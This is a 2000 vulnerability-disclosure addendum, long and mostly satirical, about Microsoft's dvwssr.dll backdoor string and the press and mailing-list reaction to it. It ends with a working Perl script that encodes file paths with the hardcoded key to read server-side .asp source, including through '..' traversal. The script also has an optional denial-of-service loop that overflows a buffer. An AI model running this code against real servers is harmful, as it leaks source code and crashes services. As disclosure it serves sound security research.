rfp2k03.txt

---------------- RFP2K03 -------------------------- rfp.labs -------------

           Contemplations on dvwssr.dll and how it affects life
                  RFP2K02 Addendum: further information

------------------------------------- rain forest puppy / rfp@wiretrip.net


  This advisory does contain new, technical information.  However, it is
  structured quite differently, and does contain a wealth of material.  It
  is your own decision whether you read it or not--I do not force you.  I
  only give you the option to listen to what I have to say.

  A.K.A. don't bitch because it's long.  Forewarning served.

--------------------------------------------------------------------------


In the words of Russ Cooper on NTBugtraq[1] on Fri:

	"Ok, so let's deal with this." [1]

Couldn't have expressed it better myself.

So there I was sitting.  An individual injecting permanent black dye into
my arm with a small electrical needle device, forming a tribal pattern
that will forever be on my arm.  Half way through I started to wonder
'why'?  And trust me, half way through a tattoo session is not a good time
to start wondering such things.

Why?  Why do such things at all?  What would others reactions be to it?
Why do I care what others think?  Who else is there really?

Deep breath.  A flood of Descartes enters my mind.  What is there beyond
myself?  How can I be assure of anything beyond me?

Quite simply, I can't.  I can't tell anyone what it's like to be in
Microsoft's place, because I haven't been there.  I don't know what it's
like to be a Netscape engineer and be called a weenie, because I'm not (a
Netscape engineer that is; the other is debatable).

I can not positively state for certain anything other than my own
perceptions, since I only know what, well, I have personally experienced.
So I can only talk of matters concerning me, as when I involve anything
beyond myself, I am making assumptions on its form, state, and the
perception it offers to me.

So I have observed the results of RFP2K02.  Every nuance, every publically
spoken word on the subject I could find, I have considered, contemplated.
What does each contemplation involve?  I review them to myself....




--[ The First: Contemplation on origin of the 'hype'

By far, one of the largest writings that has provided me with the most
contemplation was by Ivan Arce, Presidente of CORE-SDI[2].  After
reviewing my advisory, he commented:

	"So these seems to be quite precise WRT possible attackers and
	impact, the hype derived from the media coverage does not seem to
	be part of RFP's agenda." [2]

So, I start to ask myself, where did the actual hype come from?  So I
quest, searching, travelling past self doubt, skirting around fear,
stopping only at McDonalds for a #2 extra value meal (super-sized), when I
come across the original Wall Street Journal article by Ted Birdis[3].  
Ah, yes, I think this is the place.

I can only guess to the process.  My advisory provides a basis for the
problem.  But if I was Ted, I would consider that a report from an
unconfirmed party.  I am not Ted, but this is what I think he thought.  I
would go straight to the source--Microsoft.  Which, not surprisingly, he
did.

	"The manager of Microsoft's security-response center, Steve 
	Lipner, acknowledged the online-security risk in an interview
	Thursday and described such a backdoor password as "absolutely
	against our policy" and a firing offense for the
	as-yet-unidentified employees." [3]

Straight from the horses mouth.  Proceeding to the other end of the
horse...

	"Russ Cooper, who runs the popular NT Bugtraq discussion forum 
	on the Internet, estimated that the problem threatened "almost
	every Web-hosting provider."

	"It's a serious flaw,"  Cooper said. "Chances are, you're going 
	to find some major sites that still have it enabled."  Lipner of
	Microsoft said the company will warn the nation's largest Web-site
	providers directly." [3]

Well, I found that interesting.  While my advisory may have served as the
seed, it was not only confirmed by the direct party responsible, but
supported by a second opinion.

There's no doubt to me where the 'hype' came from.  It's right there.  
Lipner said "yep", and Russ said "it's widespread".  How was anyone to
know they would change their minds later?  So this was confirmed.  And it
was Russ who hyped up the widespread appeal to this...I remind myself that
my advisory stated it was minimal at best.

Then the thought occured to me...Ted Birdis actually had a lead, took the
time to follow up with the primary party, and include a secondary opinion.  
Both were in favor, so he reported it.  Considering the quality (or lack
thereof) of other journalists, Ted actually researched this, and went on
admitted facts from primary sources.  Kudos for Ted for actually reporting
a story correctly, using concrete journalistic practices.  Unfortunately
for Ted, Microsoft and Russ changed their stories...but this is not Ted's
fault.

So, I wonder, where did Ted go wrong?  I don't think he did.




--[ The Second: Contemplation on Russ Cooper's mighty morphing story
 

	"A monk asked Yun Men, 'What are the teachings of a whole
	lifetime?'  Yun Men said, 'An appropriate statement.'"
				- The Blue Cliff Record


So I sat, contemplating, when I wondered what Russ Cooper's view was on
the subject at hand.  Then I asked myself "well, at what point in time?".

I was so confused, I had to make a timeline:

* Date: Fri, 14 Apr 2000 ????

	"Russ Cooper, who runs the popular NT Bugtraq discussion forum 
	on the Internet, estimated that the problem threatened "almost
	every Web-hosting provider."

	"It's a serious flaw,"  Cooper said. "Chances are, you're going 
	to find some major sites that still have it enabled."  Lipner of
	Microsoft said the company will warn the nation's largest Web-site
	providers directly." [3]
	
* Date: Fri, 14 Apr 2000 11:27:09 -0400

	"[T]his is a hole that could allow information to be manipulated
	by "others". However, its limited to "others" who already have web
	authoring permissions on the same box." [4]

* Date: Fri, 14 Apr 2000 15:32:52 -0400

	"Latest reports say that there is
	NO VULNERABILITY IN DVWSSR.DLL" [5]

* Date: Sun, 16 Apr 2000 10:02:41 -0400

	" >NO VULNERABILITY IN DVWSSR.DLL
	While I felt right at the time, now we know that that statement 
	is clearly wrong." [6]


Ah, I now understand it much better; or, at least, it's easier to follow.
But my voices say to me, "why did it change?"

Why, indeed, I wonder.  My voices are always interesting to listen to.  My
mind wanders across the words of Russ...

	"FYI, my comments to Ted Bridis of WSJ yesterday about the issue
	were made with very little info (only the info he was supplied), 
	so for example my  comment that this affects "almost every web 
	hosting provider" was based on  the info that this was an issue 
	on machines with FP installed." [4]

Ah, indeed.  Very good reasoning for a switch in stories, I believe.  But
that begs another contemplation: why is Russ then serving to provide
comments and opinions on issues of which he as "very little info"?  Is it
professional to hypothesize the extent of such problems?

I wonder if that would be considered contributing to the 'hype'?

No, I concluded.  If *I* had said such a thing, then yes, it would be
directly contributing to the hype.  But since an authority said such,
well, I would hope that it would help clear the waters, rather than muddy
them.

Yes, muddy.  Indeed.  I breathe in.  I breathe out.  I continue to
contemplate.





--[ The Third: Contemplation on demonstration perl code

	"Even when I do things for the sake of others
	No sense of amazement or conceit arises.
	It is just like feeding myself;
	I hope for nothing in return."
				- Shantideva


Much to think about.  Much to ponder.  I will, so it seems, not be without
more contemplation.  As such, I now ponder on more words of Russ..

	"In my independent tests of a default installation of NT 4.0, IIS 4
	(from the NT 4.0 Option Kit using the "Typical" installation
	options), and SP4 (128-bit) I have been *unable* to reproduce the
	Denial of Service. Every attempt to use the CORE-SDI script, or
	variations of it, have resulted in a 401 - Unauthorized HTTP
	error. The server continues to process requests as if nothing had
	happened. The "Typical" installation installs FP98 extensions,
	enables the default web site as a Front Page Web, and installs
	the DVWSSR.DLL.

	"Please note, I'm either doing something wrong (although several
	different people have confirmed the same inability to exploit a
	default installation) or some other modification to the default
	installation must take place before you become susceptible to the
	attack. I find some reassurance in the fact the script does not
	seem to exploit a default installation, but of course I'm leery
	since both CORE-SDI and Microsoft say its possible. I have so far
	been unable to determine what exactly it takes for a site to be
	vulnerable to this problem." [6]

This makes my head spin.  Not work?  Why, I wonder, can Russ not get the
exploits to work?  Is it his lack of ability to be a script kiddie?  Are
the scripts non-functional?  Do his servers not love him?

I do not know, as I am not Russ (I can hear a giggle of relief ruffle
through the Hall of the Goddess as I say that).  But, a spark of light
envolves within me...grows...grows...enlightenment.

If I wish to test the vulnerabilities using the included perl script,
I need to change the permissions to allow myself to use dvwssr.dll
anonymously.  

What?  The voices in my head scream "but that is not normal!".  Yes, yes,
the included perl script is a *demonstration, not an exploit*. I recall it
implements the client side of dvwssr.dll, but it does not implement any
web authoring authentication, nor find a way to bypass the default
permissions.

Thus the reason Russ hits 401 'Not Authenticated' is because he is not
providing web authoring authentication.  But is there a way around this
roadblock, a way to circumvent the bane of ACLs?  I recall my own words...

	"Also, the default permissions don't allow for anonymous users to
	use the .dll--however, anyone with web authoring can, and I've
	seen few sites that have allowed permission (which is more due 
	to a misconfiguration on their part)." [8]

So I did not speak in err, but perhaps I did not speak loud enough for
Russ to hear.  Or perhaps Russ just failed to read my words at all.  I do
not know.

But I do know, that if I wish to make dvwssr.dll anonymously usable, I
need to give 'Read' permissions on /_vti_bin/_vti_aut/ folder and
dvwssr.dll contained within the folder. Once I do that, the script will
work.

Alas, my imperfections surface. There's a bug in my original script that
keeps it from properly encoding filenames greater than 31 characters in
length (I should have made it 'my $kc=length($from)%31').  The fixed code
is below.  I must accept and deal with my mistakes, firm in knowing my
imperfections take me farther away from Nirvana.

I sigh.

But I wonder, should I make a new demonstration, one that does implement
web authoring authentication?  No, I will not be making a client script
that includes web authoring authentication; therefore, this code will be
of no use to me other than a controlled demonstration.  But, demonstration
indeed, as it shows what is possible.  But the possibilities in my
imagination are endless.  In reality, they are limited.  Thus the curse of
being in a mortal vehicle.





--[ The Fourth: Contemplation on passwords and encoding mechanisms

	"[A] talent for speaking differently, rather than for
	arguing well, is the chief instrument of cultural change."
				- Richard Rorty


I do not understand.  The words of Russ ring around my little puppy
head...

	"THIS IS NOT A PASSWORD..." [7]

I'm in over my head.  I must consult a master.  So I walked over to my
shelf, and pulled the tome of tomes by the master sage himself, Bruce
Schneier [11].  "Ah", I thought, "this will hold the knowledge I need to
understand."

Chapter 1, page 1.

	"The process of disguising a message in such a way as to hide its
	substance is encryption"

Yes, I thought.  Microsoft is trying to hide the filename.  I recall that
Russ even state this himself:

	"My information says that this string is used to obfuscate file 
	names requested via the dvwssr.dll." [1]

So they are using encryption (althought, I like to think it would be
better called 'encoding', but I'm just quoting the verse of the master
sage Schneier right now).  I turn the page.

Chapter 1, page 2.

	"Plaintext is denoted by M, for message, or P, for plaintext.
	It can be a stream of bits, a text file, a bitmap, a stream
	of digitized voice, a digital video image...whatever."

I wonder if master sage Schneier would include 'filenames' on his list?
Surely, I think, he meant to.  Perhaps in an upcoming edition he could add
it.

I continue reading on the same page.

	"Ciphertext is denoted by C. [...] The encryption function E,
	operates on M to produce C.  Or, in mathmatical notation:
		E(M) = C 			

Wow, add a square (^2) in there and we'll almost have an Einsteinian
property.

	"In the reverse process, the decryption function D operates on C
	to produce M:
		D(C) = M

	Since the whole point of encrypting and then decrypting a message
	is to receive the original plaintext, the following identity must
	hold true:
		D( E(M) ) = M

So I wonder to myself, "does the weenie algorithm hold true, as master
Schneier has stated is required?".  I contemplate further:

I have a filename, which in this case would be the P (plaintext) or M
(message) I want to send to the server.  I will use M to represent the
filename, because the letter P denotes connotations that are scary and I
don't want to deal with.  Yes, much safer to use M.

So I have M.  Now, it is apparant to me that the filename is 'disguised'
during transport.  The client is responsible for disguising it, and the
server is responsible for dedisguising (is that a word, I wonder?) it.
Dvwssr.dll is the server portion, and they must take the disguised
filename, and produce the original version.  So I conclude they must have
the functional equivalent of D(), thereby taking D(C) = M, my original
filename.  My perl script take the original filename, and disguises it;
therefore, it implements E(M) = C.  C is the gobbalty-gook (an
oft used technical term) ciphertext that is transfered between the
servers.

It is clear to me.  The client implements a function E(), such that
E(filename) = encoded-filename; dvwssr.dll implements a function D(),
such that D(encoded-filename) = filename.  According to master Schneier,
this is the foundation of encryption.  Whew, I'm not barking up the wrong
tree.  Even Russ seems to think so...

	"...it contains the string because the client would obfuscate the
	requesting page with it, send it across the wire to the server,
	and then dvwssr.dll would de-obfuscate with the same string." [7]

I continue, Chapter 1, page 3.

	"If the security of an algorithm is based on keeping the way
	that algorithm works a secret, it is a restricted algorithm."

Who else knew about the details of the weenie encoding schema?  I failed
to see it published anywhere.  I would think that since only Microsoft
knew how it worked, it would be considered secret.  But I digress, as this
being a restricted algorithm or not has no direct bearing on my
contemplation.  I read.

	"Even more damning, restricted algorithms allow no quality
	control or standarization"

So that's what happened!  No wonder this snuck through Microsoft's
QC.  I press further.

	"Despite these major drawbacks, restricted algorithms are
	enormously popular for low-security applications.  Users
	either don't realize or don't care abut the security problems
	inherent intheir system.

	Modern cryptography solves this problem with a key, denoted by
	K.  This key might be any one of a large number of values."

While the master sage uses the literal term 'values', I remind my self
that a string, such as 'Netscape engineers are weenies!', being of
letters, is nothing more than values to a computer.  But is the weenie
string a key?  I must know.  Further.

	"Both the encryption and decryption operations use this key
	(i.e. they are dependant on the key and this fact is denoted by
	the K subscript), so the functions now become:
		Ek(M) = C
		Dk(C) = M

	Those functions have the property:
		Dk( Ek(M) ) = M

My neurons race.  The value of C that E() produces is dependant on the
value of K (which I have denoted in my ASCII algorithm representation [tm]
as 'k', small, to indicate subscript).  The value of M that D() produces
from C is dependant on K.  For Dk(Ek(M))=M to work, both values of K must
match.

Let's look at the algorithm itself.  I invoke the awesome power that is
perl.

	sub encodefilename {
	  my $from=shift;
	  my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZ".
	    "abcdefghijklmnopqrstuvwxyz0123456789";
	  my $key="Netscape engineers are weenies!";
	  my $kc=length($from)%31;
	  my ($fv,$kv,$tmp,$to,$lett);
	  @letts=split(//,$from);
	  foreach $lett (@letts){
	    $fv=index $slide, $lett; 
	    $fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
	    $kv=index $slide, substr $key, $kc, 1;
	    if($kv>=0 && $fv>=0){
	      $tmp= $kv - $fv;
	      if($tmp <0){$tmp +=62;}
	      $to.=substr $slide, $tmp,1; } else {
	      $to.=$lett;}
	    if(++$kc >= length($key)){ $kc=0;}
	  }return $to;}

Now, I have a filename.  The algorithm takes the difference between a
letter in the filename, and the letter in the weenie string, for each
letter in the filename.  This generated value (which you can think of as
LETTER(weenie string) - LETTER(filename) ) is then turned back into a
resulting letter, which is the 'encoded' letter.  To change it back, we
take the value of the encoded letter plus the letter of the weenie string
(or, LETTER(encoded string) + LETTER(weenie string) ), and this results
back in the same letter we originally had in the filename.

But I am over-simplifying.  I must remind myself that the actual weenie
algorithm adjusts for values above 62 and below 0, etc.  But in general,
this understanding is sufficient.

Now, for experimentation.  I succumb to change; I morph 

	"Netscape engineers are weenies!" 
to
	"Microsoft engineers are weenies!"

And alas, it didn't work.  I am stuck wondering to myself "is it because
the values of K do not now match, or is it merely a drawback of dvwssr.dll
not wanting to admit Microsoft engineers are weenies?".  Perhaps
dvwssr.dll feared bad karma by using such a phrase.  I will never know.

But I must consider, perhaps it *was* because the values of K do not
match.  If I change both values to match, would it continue to work?  From
the depths of my imagination, one of my voices (as I have many frequent
ones) says 'yes'.  Yes.  Yes, the weenie string functions as value K.
Yes, then the mathmatical property of encryption of Dk( Ek(M) ) = M does
indeed hold true.

I can feel it.  I can feel it deep within, that the string "Netscape
engineers are weenies!" functions as a private key.  But now, I wonder
of the terminology.

So I consult the great tome of master sage Schneier again.  Unfortunately,
as I progress, the pictures become more complex.  Ack, I fear, I might
have to read.

Thus I arrive at DES, the woeful algorithm that has recently fallen.
After days on contemplation, pages of notation, and hours of frustration,
I arrive at the concept of DES is such that (using the ASCII algorithm
representation [tm] used above):

		Ek(M) = C
		Dk(C) = M

Where K is the key, and E() and D() are the encrypting and decrypting
functions.  In DES applications, I have commonly referred to K as the
'password'.  I think others have to--but I am unsure about the concept of
'others'; I only know that of which is myself.  So only I know that only I
thought of K as a password.

And now my memory sparks...the mathmatical notation of DES is exact of
that of the weenie algorithm, which is the notation for the basis of
cryptographic algorithms.  And if DES calls K a 'password', then we might
be able to transliterate that same name for the K used in the weenie
algorithm.

But then an occurance comes upon me...'passwords' seem to be, to me, words
I type myself.  They are definable by myself.  I was not able to define
the string "Netscape engineers are weenies!".  But is it a 'password?'

It serves the same function, K, as what we have called 'passwords'.  But I
do not type it.  I recall such things being referenced on full-disclosure
lists prior as being 'hard-coded passwords'.  Perhaps it's one of those.
Perhaps it's a 'pass phrase'.  Or maybe I should only think of it in the
cryptological terminology: that of a 'key'.  But a 'password', in the
sense of DES, is also that of a 'key'.

So are all 'passwords' 'keys'?  Are all 'keys' 'passwords'?  How can
"Netscape engineers are weenies!" hold a value of K in the weenie
algorithm, and not be a 'password', but another string can hold the value
of K in the DES algorithm, and be called a 'password'?  I am perplexed.  
I am truly a small entity in a large world I do not understand.

I cry.  I collect myself.  I continue.  And then I come across true
enlightenment...

	"Elias Levy of SecurityFocus.com and Mark Edwards of
	NTSecurity.net have both correctly pointed out that using the term
	password to apply to that string is not beyond the realm of
	understanding. The client component mtd2lv.dll and the server
	component dvwssr.dll both need to know this value, and use it
	correctly, for communications to work. If you try and talk directly 
	to dvwssr.dll and don't obfuscate your communication with the
	correct "key", it won't understand you." [5]

Beautiful goddess!  There within that scripture, my thoughts are justified
to myself.  I push forth with new found confidence...





--[ The Fifth: Contemplation on reading files from a server

I quest for knowledge.  I wish to absorb, to obtain all that is byteful,
consume all that is binary.  I collect, amassing data, more and more,
filling memory, like a program with a malloc(3) leak.

I want files.  Alas, the instruments of the guardians prevent me from
gaining them.  ACLs, permissions, authoring, authentication...all are my
bane.  I curse them all, just as I curse JP.

If I was to have web authoring permissions, I have access to my files.
But do I have access to the void, to the files that are not mine?

Only if the knowledge is suffixed with a .asp or .asa.  This severely
limits my absorption of information.  But, I wonder, to what extent and I
control the flow of this information?

It seems I can request files of '..' nature.  My virtual hand can break
the constraints of what would be known as the 'root web directory'.
Surely web authoring wouldn't allow me to casually view files not in the
realm of all that is web?

I do not know.  I just know it works.  How dangerous this prospect is, is
not for me to judge, because I do not have this problem.  I do not use
FrontPage.  I do not mourn.  I leave the judging to Russ Cooper, and judge
he did do, indeed.





--[ The Sixth: Contemplation on this being a problem

There are moments where time can stand still...where a second in my mind
is an hour in time.  I can not control the passing of minutes; I am only
aware that what was now, is not any more.

And as I sat contemplating on a voyage of grand proportions, a scripture
did indeed materialize.  The sages at CORE-SDI have found an
imperfection, a buffer overflow, in dvwssr.dll [12].  I look down,
noticing that these words reflect the ones I had just transcribed while
captivated in the belly of the beastly of beasts, on flight over the
glimmering Atlantic ocean.

I will not, and do not, deny the word of the master sages of CORE-SDI.  I
struggle to hold back the envy that those words were published before my
own were.

I envy.  I get over it.  I provide the knowledge illustrated in perl,
appended to the end of this advisory.

But even this imperfections requires access.  I wonder, is it a problem
then?  Russ states

	"Without proper and full permissions applied across virtual
	servers on a given box, site leakage or manipulation by
	others will always be possible in myriad ways." [5]

I wonder, then, why this vulnerability is not inclusive of the above
statement?  Is it because it's doesn't allow a new method of exploitation?
Surely another path into the Nirvana is just as important as all previous;
why is it not, then, added to the list, to help enumerate the myriad of
ways?  If there were three ways were, given misconfigured permissions on
virtual severs, why can't this be problem number four?

Have we reached the allotted maximum for ways in which we can abuse web
authoring permissions?  Perhaps we should stop, then, lest we buffer
overflow...
	
Another voice rises from within.  "If this is not a problem, then why is
Microsoft still recommending the deletion of dvwssr.dll?  This actually
breaks functionality".  Ugh...yes, the voice is right.  I look upon the
words of the mighty Microsoft in aghast..

	"To eliminate this vulnerability, customers who are hosting web
	sites using any of the affected products should delete all  copies
	of the file Dvwssr.dll from their servers." [9]

Perhaps I do not understand the relationship of cause and effect.  To
offer a fix is to admit to a problem.  But if there is no problem, then
why have a fix?  I wonder what they are fixing?

The words of Yarmond on Slashdot ring quite esosterically:

	"Time for a new advertising campaign by Microsoft?
	Don't try to fix the bug, for that is impossible. You must
	realize the truth: there is no bug." [10]

In realizing the truth, my .asp files will be set free.

What is the problem?  The words of the simplest of Nomads ring true in my
mind..

	"The risks of having dvwssr.dll are not as severe as originally
	reported in media outlets Friday morning, but still severe enough
	that system administrators responsible for NT systems to
	investigate. The risks involve whether or not a certain DLL is
	loaded, how rights are set, and potentially how Front Page 98 is
	used." [13]

Is it packaged, clear cut, and sexy, as I would like to have a security
vulnerability be?  I believe not.  But that is the issue, and the only
issue, if I narrow my vision to only see the issues of the software 
itself.

I have overheard others.

"It's not a password, it's just a meaningless piece of data."

Yes, a meaningless piece of data that, when known and used correctly,
allow invoccation of the functionality of dvwssr.dll.  The same can be
said for passwords, keys, etc.

"It's not a security vulnerability; it's just a bug."

I'm sorry, but how many security vulnerabilties are not bugs?  And
apart from the buffer overflow, this .dll is functioning as designed and
intended.  Where's the bug in that (obvious jokes withheld)?

"You need web authoring to exploit this, therefore, it doesn't matter."

And one needs passwords to gain access to servers...does that make
firewalls pointless?  Do I not worry about local system security,
confident that my remotely accessible services are indeed secure?

Not to mention the facts and figures of 'insider attacks'.  Who, exactly,
does my server grant web authoring privileges to?





--[ The Seventh: Contemplation on who doesn't have a clue

I have heard of the bird trying to teach a fish to fly, but I have never
witnessed a fish coaching a bird on flight.  That is, until now.

In my stumblings, I encountered by chance an article on Computer
Reseller's News site by Imran Anwar [14].  What boggles me to no end is
the words:

	"The CRN Test Center is currently examining a security hole in
	Microsoft's FrontPage 98 Server Extensions that allows a hacker to
	cause a web server to crash via denial of service attacks." [14]

A sales channel-centric publication is conducting security tests?  Oh my,
I must sit down.  It gets better...

	"The Test Center is currently seeking the assistance of Microsoft
	and anyone that can successfully demonstrate how the
	security hole can be exploited." [14]

Another contemplation: should I offer to help?  Why does it not work?

	"The Test Center found a Perl script on the Web that appears to
	have been authored by the same individual who originally
	reported the flaw to Microsoft. However in attempting to execute
	the Perl script, Test Center Engineers ran into syntax errors in
	the script as well as un-resolved external references." [14]

There is definately something wrong in the moons tonight!  A
sales-oriented, OEM/VAR magazine conducting security testing using a
script they found on the web, that is giving unresolved external
references?  But then I see the script...

#!/usr/bin/perl# dvwssr.pl by LordRaYden :)) (neh, bij Rain Forrest Puppy)#
# Usage: dvwssr.pl target_host /file/to/retrieve/source#use
Socket;$ip=$ARGV[0];
$file=$ARGV[1];
.....

I'm befuddled.  LordRaYden has graciously provided a version of my script
where the 'use Socket' line is commented out, along with some other
modifications.  I am puzzled at all of this, yet, I feel some twinge of
amusement.

OEM/VAR sales magazines conducting security testing on vulnerabilties
using 4th-party modified exploits that don't work, and reporting on it.

My head hurts.





--[ The Eighth: Contemplation on the subliminal meanings and motivations

	"If we're going to yell "Fire", then there should at least be a
	real fire to point at."
				- Russ Cooper [6]

Ah, indeed.  A verse worth it's weight in gold.  As I stood there, with
the image of the heated flicker of fire in my eyes, I observed where I was
pointing.

But I do not have my finger extended towards the leak of .asp knowledge.
I do not even have my finger extended towards the imperfection of buffer
capacity.

My finger is pointing to the fire that seems to be burning so bright, that
Russ is blinded to it.

It is not the vehicle that concerns me; it is not even the
destination...it is the journey itself.  Thoughts of the Nietzschean
ideal of artistic science float around in my head.

I elaborate.

I'm not referring to the 'useless inclusion of a silly string meant to do
nothing'.  I mean the fact that Microsoft can, does, and then attempts to
hide situations like this.  I can not forget the original admittance of
fault.  I only wonder if it was the legal or marketing department that
stepped in and caused the change in stance.

Then I see words that worry me, from Ivan Arce:

	"Excuse me if im being rude, but in shocked by the fact that our
	company is being questioned because we found a bug." [2]

And there are other words I have gathered, which I can't speak of at the
moment, but ring of similar tone.  The fact that anyone *other than
Microsoft* is being implicated severely boggles my puppy mind.

The software of Microsoft, with the responsibilities and implications
wherein lying on the shoulders of vulnerability researchers.

I'm not going to tell you what it *is*, because I only know what I see.
But what I see is a mentality containing slander, coverup,
misorganization, and bias, and it is this same mentality that holds the
keys to many company's kingdoms.

I hope for nothing less than an angel for the one responsible for my well
being and the well being of my servers.





--[ The Ninth: Contemplation on the meaning of life

	"What sound does a server make when it stops serving?"
				- Trambottic

A hard contemplation, indeed.  But I must ask myself, why ponder the
meaning of life?  There are smaller nuances that are just as important;
for example, what is the meaning of potted meat food products?

I have always quested for the answer.  The esosteric concept of
mechanically separating a chicken, and combining it with partially
dehydronated fatty beef tissue seems to be a great mystery worth
exploring, as much of a mystery as the meaning of life itself.





--[ The Tenth: Contemplation on the echos of the Slashdot

Many, many voices.  Much enlightenment.

I recall only pieces...go to www.slashdot.org to view the crowd.


Re:I hope Microsoft SUES and WINS (Score:2)
  by Azog (thoffman1 at hotmail) on Monday April 17, @12:23AM EST

  Microsoft sent out TWO security notices regarding this DLL to
  their security mailing list in the last couple of days. 

  I guess they are part of the irresponsible press and should sue
  themselves, huh? 


Bottom Line (Score:1)
  by HiyaPower on Sunday April 16, @07:10AM EST (#198)

  Unfortunately, the bottom line still stands. While it might be hard to
  exploit this hole, the fact that it exists continues to raise serious
  doubts about the Microsoft QC, and other, perhaps more intentional,
  inclusions.


Re:Now that's professional... (Score:4, Interesting)
  by Ron Harwood (harwoodr-AT-technologist.calm) on Friday
  April 14, @06:02AM EST (#46)

  Actually, the more I think about this, the more it irritates me. 

  Believe it or not, using Visual Interdev is a pretty standard thing with
  not UNIX web-dev shops... and to come along and say - "oh yeah, we
  screwed this up because it was funny" is just insane. I cannot fathom
  what the programmers at MS are thinking. 

  And to say that "well, it doesn't affect 2000" is no better. I have to
  ask at that point, "Why? Did you come up with something even funnier for
  2000?" 


Re:Not MS policy (Score:5, Insightful)
  by Black Parrot on Friday April 14, @08:41AM EST (#221)

  >Rather I think this was a case of coders doing something
  >without the knowledge of the designers / policy makers or whatever. 

  Perhaps so. But does that make MS look better, or worse? 

  The MS web documentation (see link in my top-level post) indicates that
  this file is the "gateway" that decides what incoming HTTP connects are
  allowed to look at. If a rogue programmer can slip a backdoor into a
  security module, what else is going on in other parts of the system? 

  With this landing in the middle of the investigations/accusations of
  spyware that are now going on in France, the EU, and elsewhere, I
  suspect that history will refer to this as the Easter Revelation that
  killed closed source software. 

  To a French diplomat, it does not matter whether a backdoor was planted
  by the NSA, Microsoft, or a rogue employee. What matters is whether
  there are any backdoors in his software at all. 
                 
  --
  !pu dekcuf sreenigne tfosorciM



That's enough.  I can futher ponder over the crowd of comments at my
leisure.





--[ Inspirational scriptures

Thanks to Neohapsis.com for letting me reference their archives.

[1] http://archives.neohapsis.com/archives/ntbugtraq/current/0040.html
[2] http://archives.neohapsis.com/archives/vuln-dev/current/0153.html
[3] http://www.zdnet.com/zdnn/stories/news/0,4586,2543490,00.html
[4] http://archives.neohapsis.com/archives/ntbugtraq/current/0035.html
[5] http://archives.neohapsis.com/archives/ntbugtraq/current/0042.html
[6] http://archives.neohapsis.com/archives/ntbugtraq/current/0045.html
[7] http://archives.neohapsis.com/archives/ntbugtraq/current/0041.html
[8] http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=2
[9] http://archives.neohapsis.com/archives/vendor/current/0010.html
[10] http://slashdot.org/article.pl?sid=00/04/16/003259&mode=thread
[11] Applied Cryptography, 2nd ed. - Bruce Schneier, 1996
[12] http://archives.neohapsis.com/archives/ntbugtraq/current/0044.html
[13] http://archives.neohapsis.com/archives/vuln-dev/current/0161.html
[14] http://www.crn.com/dailies/digest/breakingnews.asp?ArticleID=15872




--[ That of which is called 'perl'

#!/usr/bin/perl
# dvwssr.pl DEMONSTRATION by rain forest puppy
#
# rfp@wiretrip.net / www.wiretrip.net/rfp/
#
# usage:  ./dvwssr.pl <target host> <file to request>
#
# example:  ./dvwssr.pl localhost /default.asp

use Socket;

$ip=$ARGV[0];
$file=$ARGV[1];

print "Encoding to: ".encodefilename($file)."\n";

$DoS=0;  # change to 1 to run the denial of service code

if($DoS==0){ # regular request

$url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file).
        " HTTP/1.0\n\n";
print sendraw($url);

} else {# denial of service - this is crud that I used to make it 
        # crash on accident.  The code was for testing something
        # else.  I provide it as-is so you can reproduce exactly
        # what I was doing.

 for($x=206;$x>0;$x--){
  $B='A'x $x;
  $file="/$B/..".$file; print "$x ";
  $url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file).
        " HTTP/1.0\n\n";
  print sendraw($url);
 }

# another DoS in the script; uncomment if you're a DoS kiddie.

#  $B='A'x 10000;
#  $file="/$B/../die.asp";
#  $url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file).
#       " HTTP/1.0\n\n";
#  print sendraw($url);

}

sub encodefilename {
my $from=shift;
my
$slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
my $key="Netscape engineers are weenies!";
my $kc=length($from)%31; # this was fixed to include the '%31'
my ($fv,$kv,$tmp,$to,$lett);
@letts=split(//,$from);
 foreach $lett (@letts){
  $fv=index $slide, $lett;
  $fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
  $kv=index $slide, substr $key, $kc, 1;
  if($kv>=0 && $fv>=0){
   $tmp= $kv - $fv;
   if($tmp <0){$tmp +=62;}
   $to.=substr $slide, $tmp,1; } else {
   $to.=$lett;}
  if(++$kc >= length($key)){ $kc=0;}
 }return $to;}

sub sendraw {
        my ($pstr)=@_;
        my $target;
        $target= inet_aton($ip) || die("inet_aton problems");
        socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);              $|=1;
                print $pstr;            my @in=<S>;
                select(STDOUT);         close(S);
                return @in;
        } else { die("Can't connect...\n"); }}



------------------------------------- rain forest puppy / rfp@wiretrip.net

                 "Bad puppy!  No bisquit!" - Carole Fennelly

---------- RFP2K03 ------------------------------------ rfp.labs ---------